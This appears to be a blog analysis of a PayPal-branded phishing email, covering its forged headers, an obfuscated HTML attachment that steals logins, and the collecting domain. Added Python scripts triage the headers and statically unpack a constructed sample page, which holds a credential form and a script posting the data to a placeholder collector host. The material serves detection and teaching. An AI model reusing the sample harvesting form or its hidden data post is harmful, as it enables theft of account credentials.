Roman Sologub

Phishing under PayPal cover

We would like to analyze a simple case of phishing, using the following e-mail as an example:

What information do we seem to get from this e-mail?

1. This e-mail was allegedly sent by PayPal.

2. It says that your PayPal account has been blocked, but that you may restore it by opening the attached HTML file and following the “instructions”.

3. The HTML file is attached to the e-mail.

To start with, let’s look at the headers:

Return-Path: <Ѓg>
Received: from smtp.dentalcremer.com.br ([189.16.55.211]) by mx.unitymail.biz
    (8.14.7/8.14.7) with ESMTP id u52FCIcl007805 for <user@target.ua>; Thu, 2
    Jun 2016 18:12:19 +0300
Date: Thu, 2 Jun 2016 18:12:18 +0300
Received: from 125.111.65.140 ([189.16.55.211]) by smtp.dentalcremer.com.br
    with Microsoft SMTPSVC(8.5.9600.16384); Thu, 2 Jun 2016 11:55:06 -0300
From: PayPal <accounts@locked.com>
Subject: Your Account Has Been Limited
Message-ID: <d0db17bebc199e2d1030d28d415bfcd7accounts@locked.com>
Content-Type: multipart/mixed; boundary="9b53dcd6f3cb7f23731e8f4a851ac1a1"
To: undisclosed-recipients:;
MIME-Version: 1.0


Even this superficial inspection shows that the e-mail was not sent by PayPal: the sender address is accounts@locked.com rather than an address at paypal.com, the message reached the recipient's mail server from smtp.dentalcremer.com.br (189.16.55.211), which is not a PayPal mail server, and the To field contains only undisclosed-recipients, which is typical of mass mailings.
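As an added example (not from the article), here is a small Python triage script that turns the header observations above into automated checks. It runs on the headers quoted in the article; the garbled Return-Path line is left out because it is unreadable on the page, and the mapping of brand names to legitimate sending domains is an assumption made for the example:

```python
"""Flag header-level phishing indicators like the ones discussed above."""
import re
from email import policy
from email.parser import Parser

# Sample input: the headers quoted in the article (the garbled Return-Path
# line is omitted because it cannot be read on the page).
RAW_HEADERS = """\
Received: from smtp.dentalcremer.com.br ([189.16.55.211]) by mx.unitymail.biz
  (8.14.7/8.14.7) with ESMTP id u52FCIcl007805 for <user@target.ua>; Thu, 2
  Jun 2016 18:12:19 +0300
Date: Thu, 2 Jun 2016 18:12:18 +0300
Received: from 125.111.65.140 ([189.16.55.211]) by smtp.dentalcremer.com.br
  with Microsoft SMTPSVC(8.5.9600.16384); Thu, 2 Jun 2016 11:55:06 -0300
From: PayPal <accounts@locked.com>
Subject: Your Account Has Been Limited
Message-ID: <d0db17bebc199e2d1030d28d415bfcd7accounts@locked.com>
Content-Type: multipart/mixed; boundary="9b53dcd6f3cb7f23731e8f4a851ac1a1"
To: undisclosed-recipients:;
MIME-Version: 1.0

"""

# Assumed mapping for this example: a display name mentioning the brand
# should only come from one of these domains.
BRAND_DOMAINS = {"paypal": {"paypal.com"}}


def domain_of(addr):
    """Lowercase domain part of an address such as 'Name <user@host>'."""
    m = re.search(r"@([\w.-]+)", addr or "")
    return m.group(1).lower() if m else ""


def under(host, domains):
    """True if host is one of the domains or a subdomain of one of them."""
    return any(host == d or host.endswith("." + d) for d in domains)


def received_hosts(msg):
    """Host named after 'from' in each Received header, top-most hop first."""
    hosts = []
    for rec in msg.get_all("Received", []):
        m = re.match(r"\s*from\s+(\S+)", rec)
        if m:
            hosts.append(m.group(1).lower())
    return hosts


def triage(raw):
    """Return a list of human-readable findings for the given raw headers."""
    msg = Parser(policy=policy.default).parsestr(raw, headersonly=True)
    findings = []
    from_hdr = msg.get("From", "")
    from_domain = domain_of(from_hdr)
    display = from_hdr.split("<")[0].strip().strip('"').lower()

    # 1. The display name claims a brand the sending domain does not belong to.
    for brand, domains in BRAND_DOMAINS.items():
        if brand in display and not under(from_domain, domains):
            findings.append(f"display name '{display}' but From domain '{from_domain}'")

    # 2. Bounces would go to a different domain than the visible sender.
    rp_domain = domain_of(msg.get("Return-Path", ""))
    if rp_domain and rp_domain != from_domain:
        findings.append(f"Return-Path domain '{rp_domain}' differs from From domain")

    # 3. No hop in the delivery path belongs to the sender or the claimed brand.
    hops = received_hosts(msg)
    trusted = {from_domain} | set().union(*BRAND_DOMAINS.values())
    if hops and not any(under(h, trusted) for h in hops):
        findings.append(f"no mail hop under {sorted(trusted)}; path was {hops}")

    # 4. Hidden recipient list, typical of bulk phishing mailings.
    if "undisclosed-recipients" in msg.get("To", "").lower():
        findings.append("recipients hidden (undisclosed-recipients)")
    return findings


if __name__ == "__main__":
    for f in triage(RAW_HEADERS):
        print("-", f)
```

For the headers quoted in the article this reports three findings: the brand/domain mismatch, a delivery path that never touches locked.com or paypal.com, and the hidden recipient list.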
If we had been more careless and run the attached file, we would have seen the following:

We see a page that claims to restore our PayPal account, where we have to fill in a form with our personal details (including our password!).

Let’s look inside the file. Part of the HTML code is encrypted (obfuscated), which is how the intruder conceals the malicious code. The file also contains JavaScript code which, when the file is opened, decrypts the malicious part of the code.

The screenshot below shows the encrypted part of the HTML page:

The next screenshot shows the decrypting mechanism, written in JavaScript:

Inside that decrypting mechanism we can find the line responsible for running the decrypted HTML page:

Let’s change that part of the JavaScript code so that it can no longer run the decrypted page:

As a result, we get a safe way to study the decrypted HTML code.

In the decrypted code, we see that all the information from the fields to be completed is sent to the official PayPal website:

However, if we look further into the JavaScript code, we see that all the information from the fields to be completed is also sent to www.demograph2.net/...php, which is certainly not related to PayPal in any way:
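The two steps above (neutralising the decoder so the page is never run, then reading where the decoded form sends its data) can be done entirely offline. The Python script below is an added example and is not the author's file or decoder: it assumes the common pattern in which the hidden HTML is percent-encoded and unpacked by document.write(unescape("...")) (the article does not say which scheme its sample used), builds a constructed sample of that pattern, decodes it in Python instead of a browser, and lists every destination host. The collector domain is a placeholder, not the address from the analysed file:

```python
"""Statically unpack an obfuscated HTML attachment and list where its forms and
scripts send data, without ever executing the embedded JavaScript."""
import re
from urllib.parse import quote, unquote, urlparse

# Constructed sample of the technique: a credential form whose HTML is hidden
# in a percent-encoded string that document.write(unescape(...)) would unpack.
# collector.example.invalid is a placeholder, not a value from the analysed file.
PLAIN_HTML = """<html><body>
<form id="f" method="post" action="https://www.paypal.com/cgi-bin/webscr">
  Email <input name="login_email"> Password <input name="login_password" type="password">
  <input type="submit" value="Log In">
</form>
<script>
document.getElementById("f").onsubmit = function () {
  var x = new XMLHttpRequest();
  x.open("POST", "http://collector.example.invalid/harvest.php", false);
  x.send(new FormData(this));   // a second copy of the form data leaves the page
};
</script></body></html>"""

# The "attachment" as an analyst would receive it: decoder plus encoded payload.
ATTACHMENT = ('<script>document.write(unescape("' + quote(PLAIN_HTML, safe="")
              + '"))</script>')


def unpack(attachment):
    """Return the HTML hidden inside document.write(unescape("...")), or '' if absent.

    The decoding happens in Python, so the page's own script never runs; this
    is the offline equivalent of removing the document.write call.
    """
    m = re.search(r'unescape\(\s*"([^"]*)"\s*\)', attachment)
    return unquote(m.group(1)) if m else ""


def destinations(html):
    """Map every absolute URL in the decoded HTML to its host, flagging form actions."""
    actions = set(re.findall(r'action=["\']([^"\']+)', html))
    urls = re.findall(r'https?://[^"\'\s<>]+', html)
    return {u: {"host": urlparse(u).hostname, "form_action": u in actions} for u in urls}


def unexpected_hosts(html, legitimate=("paypal.com",)):
    """Hosts that are neither the legitimate brand domain nor one of its subdomains."""
    out = set()
    for info in destinations(html).values():
        h = info["host"] or ""
        if not any(h == d or h.endswith("." + d) for d in legitimate):
            out.add(h)
    return sorted(out)


if __name__ == "__main__":
    decoded = unpack(ATTACHMENT)
    for url, info in destinations(decoded).items():
        print(("form action " if info["form_action"] else "script url  ") + url)
    print("unexpected hosts:", unexpected_hosts(decoded))
```

Run on the constructed sample, the form action points at www.paypal.com while the script also posts to the placeholder collector host, which is exactly the dual-destination pattern the article found in its decoded code.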

Next, let’s find the IP address this domain was assigned to in the past. To do this, we can use a resource such as http://www.tcpiputils.com/:

We can also see which other domains were assigned to this IP address before. As you can see, most of them have a history of malicious activity, including hacking, port scanning, brute-force attacks, DDoS, forum spam and Ping of Death:

Stay alert when you check your e-mail, especially when it concerns credit cards or bank accounts. Pay special attention to the address shown in the browser's address bar on any page that asks for your personal data.

Hopefully this article was helpful.
